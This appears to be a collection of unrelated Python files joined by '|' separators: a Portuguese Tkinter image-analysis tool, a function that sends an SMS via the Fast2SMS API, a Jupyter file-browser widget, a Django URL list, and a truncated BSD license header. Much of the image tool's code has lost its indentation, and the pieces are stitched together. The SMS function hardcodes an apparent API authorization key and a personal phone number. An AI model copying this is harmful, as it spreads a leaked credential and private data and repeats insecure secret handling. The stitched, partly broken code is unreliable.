perimetros = []
areas = []
alongamento = []
rugosidade = []
for p in prop:
if p['minor_axis_length'] == 0 : continue
perimetros.append(p['perimeter'])
areas.append(p['area'])
rugosidade.append(p['perimeter']**2/(4*np.pi*p['area']))
alongamento.append(p['major_axis_length']/p['minor_axis_length'])
print ('Contagem: ' + str(len(perimetros)))
print ('Perimetros (media = ' + str(np.mean(perimetros)) + ' ; desvio padrao = ' + str(np.std(perimetros)) + ')')
plt.hist(perimetros,bins=bins)
plt.show()
print ('Areas (media = ' + str(np.mean(areas)) + ' ; desvio padrao = ' + str(np.std(areas)) + ')')
plt.hist(areas,bins=bins)
plt.show()
print ('Alongamento (media = ' + str(np.mean(alongamento)) + ' ; desvio padrao = ' + str(np.std(alongamento)) + ')')
plt.hist(alongamento,bins=bins)
plt.show()
print ('Rugosidade (media = ' + str(np.mean(rugosidade)) + ' ; desvio padrao = ' + str(np.std(rugosidade)) + ')')
plt.hist(rugosidade,bins=bins)
plt.show()
def gerar_ruido_gaussiano(matriz,desv_pad=0.01):
return (sk.util.random_noise(matriz,var=desv_pad)*255).astype('uint8')
def gerar_ruido_snp(matriz,quantidade=0.1):
return (sk.util.random_noise(matriz,mode='s&p',amount=quantidade)*255).astype('uint8')
def gerar_imagem_ruido(aresta,densidade):
return (sk.util.random_noise(np.zeros((aresta[0],aresta[1])),
mode='salt',amount=densidade)*255).astype('uint8')
def extrair_bordas(matriz, mediana = 1, gaussiano = 2, realce = 2,
limiar = None, mediana2 = 0,
janela = 100, offset = 0):
bordas = filtro_mediana(matriz,mediana)
bordas = filtro_gaussiano(bordas, gaussiano)
bordas = filtro_realce(bordas,realce)
bordas = filtro_scharr(bordas)
    # Note: threshold_adaptive was removed in newer scikit-image releases;
    # threshold_local is its replacement there.
    bordas = (filters.threshold_adaptive(bordas,janela,
                                         offset=offset)*255).astype('uint8')
fundo = binarizar(matriz, limiar)
bordas = bordas * (fundo//255)
bordas = filtro_mediana(bordas,mediana2)
return bordas
def segregacao_watershed(bordas, pegada = 5, limiar = 0):
dist = mapa_distancia(bordas)
picos = feature.peak_local_max(dist,indices = False,
labels = bordas,
footprint = np.ones((pegada,pegada)),
threshold_rel = limiar)
marcadores = sp.label(picos)
    # Note: newer scikit-image versions move watershed to skimage.segmentation.
    rotulos = morphology.watershed(-dist, marcadores[0], mask = bordas)
return rotulos
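# --- Example (not part of the original module) ---
# A minimal sketch of how the segmentation helpers above might be chained;
# 'amostra.tif' is a hypothetical grayscale input file.
#
# img = pil.open('amostra.tif').convert('L')
# mat = np.array(img)
# bordas = extrair_bordas(mat, mediana=1, gaussiano=2, realce=2)
# rotulos = segregacao_watershed(bordas, pegada=5, limiar=0)
# plt.imshow(rotulos)
# plt.show()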
'''
Interface
'''
class Interface():
def __init__(self, parent):
self.parent = parent
self.img = None
self.img_desfazer = None
self.main_frame = tk.Frame(self.parent)
self.main_frame.pack()
self.image_frame = tk.Frame(self.parent)
self.image_frame.pack(fill=tk.BOTH, expand = 1)
self.canvas = tk.Canvas(self.image_frame,
relief = tk.SUNKEN)
self.canvas.config(width=200,height=200)
self.canvas.pack(side=tk.TOP, fill=tk.BOTH, expand = 1)
self.sbV = tk.Scrollbar(self.canvas, orient=tk.VERTICAL)
self.sbH = tk.Scrollbar(self.canvas, orient=tk.HORIZONTAL)
self.sbV.config(command=self.canvas.yview)
self.sbH.config(command=self.canvas.xview)
self.canvas.config(yscrollcommand=self.sbV.set)
self.canvas.config(xscrollcommand=self.sbH.set)
self.sbV.pack(side=tk.RIGHT, fill=tk.Y)
self.sbH.pack(side=tk.BOTTOM, fill=tk.X)
'''
        Menu button initialization
'''
self.menu = tk.Menu(parent)
self.menu_arquivo = tk.Menu(self.menu,tearoff=0)
self.menu_arquivo.add_command(label="Abrir imagem",
command = self.carregar_imagem)
self.menu_arquivo.add_command(label="Salvar imagem",
command = self.salvar_imagem)
self.menu_arquivo.add_command(label="Fechar imagem",
command = self.fechar_imagem)
self.menu_arquivo.add_command(label="Defazer",
command = self.desfazer)
self.menu_arquivo.add_command(label="Sair",
command = self.fechar)
self.menu.add_cascade(label = 'Arquivo',
menu=self.menu_arquivo)
self.menu_transformar = tk.Menu(self.menu,tearoff=0)
self.menu_transformar.add_command(label='Converter escala de cinza',
command = self.escala_de_cinza)
self.menu_transformar.add_command(label = 'Binarizar...',
command = self.binarizar)
self.menu_transformar.add_command(label = 'Mapa de distancia',
command = self.mapa_distancia)
self.menu_transformar.add_command(label = 'Inverter',
command = self.inverter)
self.menu_transformar.add_command(label = 'Rotular',
command = self.rotular)
self.menu.add_cascade(label="Transformar",
menu = self.menu_transformar)
self.menu_filtros = tk.Menu(self.menu, tearoff = 0)
self.menu_filtros.add_command(label = 'Expandir Contraste',
command = self.expandir_contraste)
self.menu_filtros.add_command(label = 'Equalizar Histograma',
command = self.equalizar_histograma)
self.menu_filtros.add_command(label = 'Filtro Gaussiano...',
command = lambda: self.filtro('init gauss'))
self.menu_filtros.add_command(label = 'Filtro da Mediana...',
command = lambda: self.filtro('init media'))
self.menu_filtros.add_command(label = 'Filtro Realce...',
command = lambda: self.filtro('init real'))
self.menu_filtros.add_command(label = 'Filtro Prewitt',
command = self.filtro_prewitt)
self.menu_filtros.add_command(label = 'Filtro Sobel',
command = self.filtro_sobel)
self.menu_filtros.add_command(label = 'Filtro Scharr',
command = self.filtro_scharr)
self.menu.add_cascade(label="Filtros", menu = self.menu_filtros)
self.menu_info = tk.Menu(self.menu, tearoff = 0)
self.menu_info.add_command(label = 'Histograma...',
command = self.histograma)
self.menu_info.add_command(label = 'Correlacao',
command = self.correlacao)
self.menu_info.add_command(label = 'Conectividade',
command = self.conectividade)
self.menu_info.add_command(label = 'Propriedades',
command = self.propriedades)
self.menu.add_cascade(label="Info", menu = self.menu_info)
self.menu_morfologia = tk.Menu(self.menu, tearoff = 0)
self.menu_morfologia.add_command(label = 'Erosao...',
command = lambda: self.morfologia('init erosao'))
self.menu_morfologia.add_command(label = 'Dilatacao...',
command = lambda: self.morfologia('init dilatacao'))
self.menu_morfologia.add_command(label='Abertura...',
command = lambda: self.morfologia('init abertura'))
self.menu_morfologia.add_command(label = 'Fechamento...',
command = lambda: self.morfologia('init fechamento'))
self.menu_morfologia.add_command(label = 'Granulometria',
command = self.granulometria)
self.menu.add_cascade(label="Morfologia", menu=self.menu_morfologia)
self.menu_ruido = tk.Menu(self.menu, tearoff = 0)
self.menu_ruido.add_command(label = 'Gerar Ruido Gaussiano...',
command = lambda: self.filtro('init gaussiano'))
self.menu_ruido.add_command(label = 'Gerar Ruido "Sal e Pimenta"...',
command = lambda: self.filtro('init snp'))
self.menu_ruido.add_command(label = 'Criar Imagem com Ruido...',
command = lambda: self.gerar_imagem_ruido('init'))
self.menu.add_cascade(label="Ruido", menu=self.menu_ruido)
self.menu_bordas = tk.Menu(self.menu, tearoff=0)
self.menu_bordas.add_command(label = 'Extrair Bordas...',
command = self.extrair_bordas)
self.menu_bordas.add_command(label = 'Segregacao Watershed...',
command = self.segregacao_watershed)
self.menu.add_cascade(label="Bordas", menu=self.menu_bordas)
'''
        End of menu button initialization
'''
'''
        Secondary window initialization
'''
# Histograma
self.janela_histograma = tk.Toplevel(self.parent)
self.janela_histograma.withdraw()
self.histograma_show = tk.Label(self.janela_histograma)
self.histograma_show.pack(side=tk.TOP)
self.histograma_button = tk.Button(self.janela_histograma,
text='Fechar',
command = self.janela_histograma.withdraw)
self.histograma_button.pack(side=tk.TOP)
        # Binarization window
self.janela_binarizar = tk.Toplevel(self.parent)
self.janela_binarizar.protocol('WM_DELETE_WINDOW', lambda: print('Invalido'))
self.janela_binarizar.withdraw()
self.binarizar_show = tk.Label(self.janela_binarizar)
self.binarizar_show.pack(side=tk.TOP)
self.binarizar_botoes = tk.Label(self.janela_binarizar)
self.binarizar_botoes.pack(side = tk.TOP)
self.binarizar_fechar = tk.Button(self.binarizar_botoes,
text='Cancelar',
command = lambda: self.binarizar('cancelar'))
self.binarizar_fechar.pack(side=tk.LEFT)
self.binarizar_ok = tk.Button(self.binarizar_botoes,
text = 'OK',
command = lambda: self.binarizar('confirmar'))
self.binarizar_ok.pack(side = tk.LEFT)
self.binarizar_parametros = tk.Label(self.janela_binarizar)
self.binarizar_parametros.pack(side = tk.TOP)
self.label_limiar = tk.Label(self.binarizar_parametros,
text = 'Limiar()')
self.label_limiar.grid(row=0,column=0)
self.limiar_binarizacao = tk.StringVar()
self.entry_limiar = tk.Entry(self.binarizar_parametros,
textvariable = self.limiar_binarizacao)
self.entry_limiar.grid(row=0,column=1)
self.limiar_binarizacao.trace('w',lambda a,b,c: self.binarizar('atualizar'))
self.binarizar_botao_aumentar = tk.Button(self.binarizar_parametros,
text = '+',
command = lambda: self.binarizar('aumentar'))
self.binarizar_botao_aumentar.grid(row=0,column=2)
self.binarizar_botao_diminuir = tk.Button(self.binarizar_parametros,
text = '-',
command = lambda: self.binarizar('diminuir'))
self.binarizar_botao_diminuir.grid(row=0,column=3)
# Filtros
self.funcao_filtro = None
self.janela_filtro = tk.Toplevel(self.parent)
self.janela_filtro.protocol('WM_DELETE_WINDOW', lambda: print('Invalido'))
self.filtro_label = tk.Label(self.janela_filtro)
self.filtro_label.grid(row = 0, column = 0)
self.filtro_var = tk.StringVar()
self.filtro_var.trace('w', lambda a,b,c: self.funcao_filtro('atualizar'))
self.filtro_campo = tk.Entry(self.janela_filtro,
textvariable = self.filtro_var)
self.filtro_campo.grid(row = 0, column = 1)
self.filtro_botao_aumentar = tk.Button(self.janela_filtro,
text = '+',
command = lambda: self.funcao_filtro('aumentar'))
self.filtro_botao_aumentar.grid(row=0, column = 2)
self.filtro_botao_diminuir = tk.Button(self.janela_filtro,
text = '-',
command = lambda: self.funcao_filtro('diminuir'))
self.filtro_botao_diminuir.grid(row=0, column = 3)
self.filtro_botao_ok = tk.Button(self.janela_filtro,
text = 'OK',
command = lambda: self.funcao_filtro('aceitar'))
self.filtro_botao_ok.grid(row=1, column = 0)
self.filtro_botao_cancelar = tk.Button(self.janela_filtro,
text = 'Cancelar',
command = lambda: self.funcao_filtro('cancelar'))
self.filtro_botao_cancelar.grid(row=1, column = 1)
self.janela_filtro.withdraw()
        # Noise window
self.janela_ruido = tk.Toplevel(self.parent)
self.ruido_var1 = tk.StringVar()
self.ruido_var1.set('100')
self.ruido_var1.trace('w', lambda a,b,c: self.gerar_imagem_ruido('atualizar'))
self.ruido_label1 = tk.Label(self.janela_ruido, text = 'Altura(100): ')
self.ruido_label1.grid(column = 0, row = 0)
self.ruido_entry1 = tk.Entry(self.janela_ruido,
textvariable = self.ruido_var1)
self.ruido_entry1.grid(row = 0, column = 1)
self.ruido_var2 = tk.StringVar()
self.ruido_var2.set('100')
self.ruido_var2.trace('w', lambda a,b,c: self.gerar_imagem_ruido('atualizar'))
self.ruido_label2 = tk.Label(self.janela_ruido, text = 'Largura(100): ')
self.ruido_label2.grid(column = 0, row = 1)
self.ruido_entry2 = tk.Entry(self.janela_ruido,
textvariable = self.ruido_var2)
self.ruido_entry2.grid(column=1, row=1)
self.ruido_var3 = tk.StringVar()
self.ruido_var3.set('0.5')
self.ruido_var3.trace('w', lambda a,b,c: self.gerar_imagem_ruido('atualizar'))
self.ruido_label3 = tk.Label(self.janela_ruido, text = 'Proporcao(0.5): ')
self.ruido_label3.grid(column = 0, row = 2)
self.ruido_entry3 = tk.Entry(self.janela_ruido,
textvariable = self.ruido_var3)
self.ruido_entry3.grid(column=1, row=2)
self.ruido_ok = tk.Button(self.janela_ruido,
text = 'OK',
command = lambda: self.gerar_imagem_ruido('aceitar'))
self.ruido_ok.grid(column = 0, row = 3)
self.ruido_cancelar = tk.Button(self.janela_ruido,
text = 'Cancelar',
command = lambda: self.gerar_imagem_ruido('cancelar'))
self.ruido_cancelar.grid(row = 3, column = 1)
self.janela_ruido.withdraw()
parent.config(menu=self.menu)
parent.geometry('400x300')
def salvar_imagem(self):
        if self.img is not None:
salvar(self.img)
def fechar(self):
self.parent.quit()
self.parent.destroy()
def carregar_imagem(self):
self.img = pil.open(filedialog.askopenfilename())
self.img_desfazer = None
self.atualizar()
def fechar_imagem(self):
self.img, self.img_desfazer = None, self.img
self.atualizar()
def desfazer(self):
        if self.img_desfazer is None:
print ('Sem imagem para desfazer')
return
self.img, self.img_desfazer = self.img_desfazer, self.img
self.atualizar()
def atualizar(self):
self.canvas.delete('all')
        if self.img is None:
return
self.photo_img = imagetk.PhotoImage(self.img)
size = self.img.size
self.canvas_image = self.canvas.create_image(0,0,anchor='nw',
image=self.photo_img)
self.canvas.config(width=min(size[0],MAX_WIDTH),
height=min(size[1],MAX_HEIGHT) )
self.canvas.config(scrollregion=(0,0,size[0],size[1]))
def escala_de_cinza(self):
if self.img.mode == 'L':
return
self.img_desfazer = self.img
self.img = self.img.convert('L')
self.atualizar()
def binarizar(self, modo = 'iniciar'):
'''
        Modes: iniciar, confirmar, atualizar, cancelar, aumentar, diminuir
'''
if modo == 'iniciar':
if self.img.mode == 'L':
mat = np.array(self.img)
else:
mat = np.array(self.img.convert('L'))
            histograma(mat)  # stores the plot in pyplot's current internal figure (plt.gcf())
self.hist_img = plt_to_image().copy()
self.hist_img = imagetk.PhotoImage(self.hist_img.convert('RGB'))
self.hist_ref = self.hist_img
self.binarizar_show.config(image=self.hist_img)
self.janela_binarizar.deiconify()
self.otsu = filters.threshold_otsu(np.array(self.img))
self.label_limiar.configure(text = 'Limiar ('+str(self.otsu)+') :')
self.img_original = self.img.copy()
self.limiar_valido = self.otsu
self.limiar_binarizacao.set(self.otsu)
elif modo == 'confirmar':
self.img_desfazer = self.img_original
self.janela_binarizar.withdraw()
elif modo == 'atualizar':
if not self.limiar_binarizacao.get().isdigit() and self.limiar_binarizacao.get() != '':
self.limiar_binarizacao.set(self.limiar_valido)
return
elif self.limiar_binarizacao.get() == "":
self.limiar_valido = ""
return
self.limiar_valido = int(self.limiar_binarizacao.get())
self.img = binarizar(np.array(self.img_original),
int(self.limiar_binarizacao.get()))
self.img = pil.fromarray(self.img)
self.atualizar()
elif modo == 'cancelar':
self.img = self.img_original
self.atualizar()
self.janela_binarizar.withdraw()
elif modo == 'aumentar':
self.limiar_binarizacao.set(str(int(self.limiar_binarizacao.get())+1))
elif modo == 'diminuir':
self.limiar_binarizacao.set(str(int(self.limiar_binarizacao.get())-1))
def histograma(self):
if self.img.mode == 'L':
mat = np.array(self.img)
else:
mat = np.array(self.img.convert('L'))
        histograma(mat)  # stores the plot in pyplot's current internal figure (plt.gcf())
self.hist_img = plt_to_image().copy()
self.hist_img = imagetk.PhotoImage(self.hist_img.convert('RGB'))
self.hist_ref = self.hist_img
self.histograma_show.config(image=self.hist_img)
self.janela_histograma.deiconify()
def mapa_distancia(self):
mat = np.array(self.img)
binaria = verificar_binaria(mat)
print (binaria)
if not binaria:
return
self.img_desfazer = self.img.copy()
self.img = pil.fromarray(mapa_distancia(mat))
self.atualizar()
def inverter(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = inverter(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(inverter,(mat1,mat2,mat3)))
mat = np.stack((mat1, mat2, mat3),axis=-1)
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def expandir_contraste(self):
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
self.img = pil.fromarray(expandir_contraste(mat))
self.atualizar()
def equalizar_histograma(self):
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
self.img = pil.fromarray(equalizar_histograma(mat))
self.atualizar()
def filtro(self,modo):
'''
        modes: init gauss, init media, init real, atualizar, confirmar,
cancelar, aumentar, diminuir
'''
print(modo)
if modo.split()[0] == 'init':
self.funcao_filtro = self.filtro
filtro = modo.split()[1]
if filtro == 'gauss':
self.filtro_atual = filtro_gaussiano
self.janela_filtro.title('Filtro Gaussiano')
self.filtro_label.config(text = 'Desvio Padrao (1.0)')
elif filtro == 'media':
if self.img.mode != 'L':
print ('Filtro disponivel apenas em escala de cinza')
return
self.filtro_atual = filtro_mediana
self.janela_filtro.title('Filtro da Mediana')
self.filtro_label.config(text = 'Tamanho Disco (1.0)')
elif filtro == 'real':
if self.img.mode != 'L':
print ('Filtro disponivel apenas em escala de cinza')
return
self.filtro_atual = filtro_realce
self.janela_filtro.title('Filtro da Realce')
self.filtro_label.config(text = 'Tamanho Disco (1.0)')
elif filtro == 'gaussiano':
self.filtro_atual = gerar_ruido_gaussiano
self.janela_filtro.title('Filtro Gaussiano')
self.filtro_label.config(text = 'Desvio Padrao (0.1)')
elif filtro == 'snp':
self.filtro_atual = gerar_ruido_snp
self.janela_filtro.title('Filtro Sal e Pimenta')
self.filtro_label.config(text = 'Densidade (0.1)')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('1.0')
self.filtro_var_valida = '1.0'
elif modo == 'atualizar':
if self.filtro_var.get() == '':
self.filtro_var_valida = ''
self.img = self.img_original
self.atualizar()
return
valid = [i for i in self.filtro_var.get()
if i in '1234567890.']
if len(valid) != len(self.filtro_var.get()) or self.filtro_var.get().count('.') > 1:
self.filtro_var.set(self.filtro_var_valida)
return
print ('atualizando')
mat = np.array(self.img_original)
mat = self.filtro_atual(mat,float(self.filtro_var.get()))
self.img = pil.fromarray(mat)
self.atualizar()
elif modo == 'cancelar':
self.img = self.img_original
self.janela_filtro.withdraw()
self.atualizar()
elif modo == 'aceitar':
            self.img_desfazer = self.img_original
self.janela_filtro.withdraw()
elif modo == 'aumentar':
self.filtro_var.set(str(float(self.filtro_var.get())+1))
elif modo == 'diminuir':
if float(self.filtro_var.get()) < 1:
self.filtro_var.set('0')
else:
self.filtro_var.set(str(float(self.filtro_var.get())-1))
def filtro_prewitt(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = filtro_prewitt(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(filtro_prewitt,(mat1,mat2,mat3)))
mat = (mat1 + mat2 + mat3)//3
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def filtro_sobel(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = filtro_sobel(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(filtro_sobel,(mat1,mat2,mat3)))
mat = (mat1 + mat2 + mat3)//3
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def filtro_scharr(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = filtro_scharr(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(filtro_scharr,(mat1,mat2,mat3)))
mat = (mat1 + mat2 + mat3)//3
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def morfologia(self, modo):
'''
        modes: init erosao, init dilatacao, init abertura, init fechamento,
atualizar, cancelar, confirmar, aumentar, diminuir
'''
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
if modo.split()[0] == 'init':
            # route the filter-window callbacks back to this method
            self.funcao_filtro = self.morfologia
filtro = modo.split()[1]
if filtro == 'erosao':
self.filtro_atual = erosao
self.janela_filtro.title('Erosao')
self.filtro_label.config(text = 'Erosao(1): ')
elif filtro == 'dilatacao':
self.filtro_atual = dilatacao
self.janela_filtro.title('Dilatacao')
self.filtro_label.config(text = 'Dilatacao(1): ')
elif filtro == 'abertura':
self.filtro_atual = abertura
self.janela_filtro.title('Abertura')
self.filtro_label.config(text = 'Abertura(1): ')
elif filtro == 'fechamento':
self.filtro_atual = fechamento
self.janela_filtro.title('Fechamento')
self.filtro_label.config(text = 'Fechamento (1): ')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('1')
self.filtro_var_valida = '1'
elif modo == 'atualizar':
            if self.filtro_var.get() in ('', '0'):
self.filtro_var_valida = ''
self.img = self.img_original
self.atualizar()
return
valid = [i for i in self.filtro_var.get()
if i in '1234567890']
if len(valid) != len(self.filtro_var.get()) or self.filtro_var.get().count('.') > 1:
self.filtro_var.set(self.filtro_var_valida)
return
mat = np.array(self.img_original)
mat = self.filtro_atual(mat,float(self.filtro_var.get()))
self.img = pil.fromarray(mat)
self.atualizar()
elif modo == 'cancelar':
self.img = self.img_original
self.janela_filtro.withdraw()
self.atualizar()
elif modo == 'aceitar':
            self.img_desfazer = self.img_original
self.janela_filtro.withdraw()
elif modo == 'aumentar':
self.filtro_var.set(str(float(self.filtro_var.get())+1))
elif modo == 'diminuir':
if float(self.filtro_var.get()) < 1:
self.filtro_var.set('0')
else:
self.filtro_var.set(str(float(self.filtro_var.get())-1))
def granulometria(self):
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
plt.clf()
mat = np.array(self.img)
granulometria(mat)
self.granulometria_img = plt_to_image().copy()
self.granulometria_img = imagetk.PhotoImage(
self.granulometria_img.convert('RGB'))
self.gran_img_ref = self.granulometria_img
self.histograma_show.config(image=self.granulometria_img)
self.janela_histograma.deiconify()
def correlacao(self):
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
plt.clf()
mat = np.array(self.img)
correlacao(mat)
self.granulometria_img = plt_to_image().copy()
self.granulometria_img = imagetk.PhotoImage(
self.granulometria_img.convert('RGB'))
self.gran_img_ref = self.granulometria_img
self.histograma_show.config(image=self.granulometria_img)
self.janela_histograma.deiconify()
def rotular(self):
binaria =verificar_binaria(np.array(self.img))
if not binaria:
print('Funcao apenas para imagens binarias')
return
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
mat = rotular_colorido(mat)
print(mat.max())
self.img = pil.fromarray(mat)
self.atualizar()
def conectividade(self):
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
plt.clf()
mat = np.array(self.img)
conectividade(mat)
self.granulometria_img = plt_to_image().copy()
self.granulometria_img = imagetk.PhotoImage(
self.granulometria_img.convert('RGB'))
self.gran_img_ref = self.granulometria_img
self.histograma_show.config(image=self.granulometria_img)
self.janela_histograma.deiconify()
def propriedades(self):
pass
def gerar_ruido(self,modo):
if modo == 'init gaussiano':
self.funcao_filtro = self.gerar_ruido
self.filtro_atual = gerar_ruido_gaussiano
self.janela_filtro.title('Filtro Gaussiano')
self.filtro_label.config(text = 'Desvio Padrao (1.0)')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('1.0')
self.filtro_var_valida = '1.0'
elif modo == 'init snp':
self.funcao_filtro = self.gerar_ruido
self.filtro_atual = gerar_ruido_snp
self.janela_filtro.title('Filtro Sal e Pimenta')
self.filtro_label.config(text = 'Densidade (0.1)')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('0.1')
self.filtro_var_valida = '0.1'
def gerar_ruido_snp(self):
pass
def gerar_imagem_ruido(self, modo):
'''
        modes: init, atualizar, aceitar, cancelar
'''
        if self.img is not None:
print('Gerar imagens apenas se nao houver imagem carregada')
return
if modo == 'init':
self.ruido_var1_valida = self.ruido_var1.get()
self.ruido_var2_valida = self.ruido_var2.get()
self.ruido_var3_valida = self.ruido_var3.get()
self.janela_ruido.deiconify()
elif modo == 'atualizar':
for var in (self.ruido_var1,):
valid = [i for i in var.get()
if i in '1234567890']
if len(valid) != len(var.get()) or var.get().count('.') > 1:
var.set(self.ruido_var1_valida)
return
for var in (self.ruido_var2,):
valid = [i for i in var.get()
if i in '1234567890']
if len(valid) != len(var.get()) or var.get().count('.') > 1:
var.set(self.ruido_var2_valida)
return
for var in (self.ruido_var3,):
valid = [i for i in var.get()
if i in '1234567890.']
if len(valid) != len(var.get()) or var.get().count('.') > 1:
var.set(self.ruido_var3_valida)
return
self.ruido_var1_valida = self.ruido_var1.get()
self.ruido_var2_valida = self.ruido_var2.get()
self.ruido_var3_valida = self.ruido_var3.get()
elif modo == 'cancelar':
self.janela_ruido.withdraw()
elif modo == 'aceitar':
            altura = int(self.ruido_var1.get())
            largura = int(self.ruido_var2.get())
            densidade = float(self.ruido_var3.get())
            self.img = pil.fromarray(gerar_imagem_ruido(
                    (altura,largura),densidade))
self.atualizar()
self.janela_ruido.withdraw()
def extrair_bordas(self):
binaria = verificar_binaria(np.array(self.img))
if not binaria:
print('Funcao apenas para imagens binarias')
return
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
mat = extrair_bordas(mat, mediana = 1, gaussiano = 2, realce = 2,
limiar = None, mediana2 = 0,
janela = 100, offset = 0)
print(mat.max())
self.img = pil.fromarray(mat)
self.atualizar()
def segregacao_watershed(self):
binaria = verificar_binaria(np.array(self.img))
if not binaria:
print('Funcao apenas para imagens binarias')
return
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
mat = segregacao_watershed(mat, pegada = 5, limiar = 0)
print(mat.max())
self.img = pil.fromarray(mat)
self.atualizar()
root = tk.Tk()
root.title('Imaginos')
interface = Interface(root)
root.mainloop()
|
import pandas as pd
def sendMessage():
    # Send an SMS notification through the Fast2SMS bulk API.
    import requests
url = "https://www.fast2sms.com/dev/bulk"
payload = "sender_id=FSTSMS&message=The%20model%20have%20been%20trained%20successfully&language=english&route=p&numbers=8126102904"
headers = {
'authorization': "OuX3BnsANZWIvpQzT70ikgD4ERwehbyHdV2Ff6MmSL51jCU8KoHnlJ3aR0FVTeK6buhgvmy9dkL7zqYj",
'Content-Type': "application/x-www-form-urlencoded",
'Cache-Control': "no-cache",
}
response = requests.request("POST", url, data=payload, headers=headers)
print(response.text)
|
"""
Class implementing a simple file browser for Jupyter
"""
# Author: Guillaume Witz, Science IT Support, Bern University, 2019
# License: BSD3
import ipywidgets as ipw
from pathlib import Path
class Folders:
def __init__(self, rows=10, window_width=300, init_path=None):
style = {"description_width": "initial"}
layout = {"width": "300px"}
if init_path is None:
self.cur_dir = Path(".").resolve()
else:
self.cur_dir = Path(init_path).resolve()
self.out = ipw.Output()
self.file_list = ipw.SelectMultiple(
rows=rows, layout={"width": str(window_width) + "px"}
)
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
self.refresh_button = ipw.Button(
description="Refresh folder content", style=style, layout=layout
)
self.refresh_button.on_click(self.refresh)
def get_files(self):
current_files = [x.name for x in self.cur_dir.glob("*") if not x.is_dir()]
current_folders = [x.name for x in self.cur_dir.glob("*") if x.is_dir()]
current_files = sorted(current_files, key=str.lower)
current_folders = sorted(current_folders, key=str.lower)
return current_folders + current_files
def refresh(self, b):
self.file_list.unobserve(self.move_folders, names="value")
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
def move_folders(self, change):
if len(change["new"]) == 0:
self.cur_dir = self.cur_dir.resolve().parent
else:
if change["new"][0] == "..":
self.cur_dir = self.cur_dir.resolve().parent
self.file_list.unobserve(self.move_folders, names="value")
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
else:
old_dir = self.cur_dir
self.cur_dir = self.cur_dir.joinpath(change["new"][0])
if self.cur_dir.is_dir():
self.file_list.unobserve(self.move_folders, names="value")
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
else:
self.cur_dir = old_dir
def go_to_folder(self, folder):
self.cur_dir = Path(folder).resolve()
self.refresh(None)
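# --- Example (not part of the original module) ---
# A minimal usage sketch, assuming it runs inside a Jupyter notebook:
#
# from IPython.display import display
# browser = Folders(rows=8, init_path=".")
# display(browser.file_list, browser.refresh_button)
# # The folder currently being browsed is available as browser.cur_dir.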
|
from . import views
from django.urls import path
from django.contrib import admin
urlpatterns = [
    path("admin/", admin.site.urls),
    path("", views.index, name="index"),
    path("maps", views.base, name="base"),
    path("profile", views.profile, name="profile"),
    path("add_todo", views.add_todo, name="add_todo"),
    path("delete_todo/<int:todo_id>", views.delete_todo, name="delete_todo"),
]
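# --- Example (not part of the original project) ---
# A hypothetical sketch of the views this URLconf points to; the template
# name and the Todo model below are illustrative assumptions only.
#
# from django.shortcuts import render, redirect
# from .models import Todo
#
# def index(request):
#     return render(request, "index.html", {"todos": Todo.objects.all()})
#
# def delete_todo(request, todo_id):
#     Todo.objects.filter(id=todo_id).delete()
#     return redirect("index")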
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Christiaan Frans Rademan <chris@fwiw.co.za>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
